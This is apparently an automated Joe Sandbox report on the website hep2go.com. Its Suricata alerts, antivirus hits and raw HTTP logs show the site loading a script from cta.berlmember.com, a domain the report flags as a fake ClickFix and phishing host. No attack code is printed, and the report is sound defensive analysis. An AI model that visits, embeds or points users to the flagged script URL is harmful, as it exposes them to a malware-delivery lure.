Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://hep2go.com

Overview

General Information

Sample URL:http://hep2go.com
Analysis ID:1615208
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Detected non-DNS traffic on DNS port
Stores files to the Windows start menu directory
Suspicious form URL found

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 5928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,18123290374646496901,1641604594129139991,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6556 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://hep2go.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-14T16:40:52.683611+010020599411Exploit Kit Activity Detected192.168.2.16530291.1.1.153UDP
2025-02-14T16:40:52.683769+010020599411Exploit Kit Activity Detected192.168.2.16540031.1.1.153UDP
2025-02-14T16:40:56.839008+010020599411Exploit Kit Activity Detected192.168.2.16574851.1.1.153UDP
2025-02-14T16:40:56.839384+010020599411Exploit Kit Activity Detected192.168.2.16582451.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-14T16:40:53.993019+010020599421Exploit Kit Activity Detected192.168.2.1649733103.52.144.214443TCP
2025-02-14T16:40:59.133853+010020599421Exploit Kit Activity Detected192.168.2.1649752103.52.144.214443TCP
2025-02-14T16:41:03.259825+010020599421Exploit Kit Activity Detected192.168.2.1649780103.52.144.214443TCP
2025-02-14T16:41:07.639997+010020599421Exploit Kit Activity Detected192.168.2.1649818103.52.144.214443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://cta.berlmember.com/google/jquery.phpAvira URL Cloud: Label: phishing
Source: https://www.hep2go.com/HTTP Parser: Form action: https://www.hep2go.com/login.php?userRef=gciaake
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaakeHTTP Parser: Form action: https://www.hep2go.com/login.php?userRef=gciaake
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaakeHTTP Parser: Form action: https://www.hep2go.com/login.php?userRef=gciaake
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaakeHTTP Parser: <input type="password" .../> found
Source: https://www.hep2go.com/HTTP Parser: No favicon
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaakeHTTP Parser: No favicon
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaakeHTTP Parser: No favicon
Source: https://www.hep2go.com/HTTP Parser: No <meta name="author".. found
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaakeHTTP Parser: No <meta name="author".. found
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaakeHTTP Parser: No <meta name="author".. found
Source: https://www.hep2go.com/HTTP Parser: No <meta name="copyright".. found
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaakeHTTP Parser: No <meta name="copyright".. found
Source: https://www.hep2go.com/log-in-2.php?userRef=gciaakeHTTP Parser: No <meta name="copyright".. found
Source: chrome.exeMemory has grown: Private usage: 13MB later: 27MB

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:53029 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:54003 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49733 -> 103.52.144.214:443
Source: Network trafficSuricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:57485 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059941 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in DNS Lookup (cta .berlmember .com) : 192.168.2.16:58245 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49752 -> 103.52.144.214:443
Source: Network trafficSuricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49780 -> 103.52.144.214:443
Source: Network trafficSuricata IDS: 2059942 - Severity 1 - ET EXPLOIT_KIT Fake ClickFix Domain in TLS SNI (cta .berlmember .com) : 192.168.2.16:49818 -> 103.52.144.214:443
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.16:57923 -> 162.159.36.2:53
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.136
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /javascript/jquery-1.11.3.min.js HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /javascript/user_ref.001.js HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /include/obj.js HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /javascript/cart.001.js HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /javascript/scripts.002.js HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /javascript/user_ref.001.js HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /include/obj.js HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /javascript/scripts.002.js HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /javascript/cart.001.js HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /javascript/jquery-1.11.3.min.js HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /images/try-it-out-over-3.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /images/log-in-index.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /images/sign-up-index.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /images/progress.gif HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /ajax/ur_get_user_name.php HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /google/jquery.php HTTP/1.1Host: cta.berlmember.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/log-in-index.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /ajax/logout_get_id.php?userRef=gciaake HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /images/progress.gif HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /images/sign-up-index.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04
Source: global trafficHTTP traffic detected: GET /images/try-it-out-over-3.jpg HTTP/1.1Host: www.hep2go.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /google/jquery.php HTTP/1.1Host: cta.berlmember.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: hep2go.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /log-in-2.php?userRef=gciaake HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.hep2go.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /javascript/scripts.002.js?rnd=733704651 HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.hep2go.com/log-in-2.php?userRef=gciaakeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
Source: global trafficHTTP traffic detected: GET /log-in-2.php?userRef=gciaake HTTP/1.1Host: www.hep2go.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.hep2go.com/log-in-2.php?userRef=gciaakeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4bb2f1c04cadf7ab7e90021cf7192b04; _ga=GA1.2.1026516816.1739547653; _gid=GA1.2.1106437759.1739547653; _gat=1; _ga_WMZXJKTR1T=GS1.2.1739547655.1.0.1739547655.0.0.0
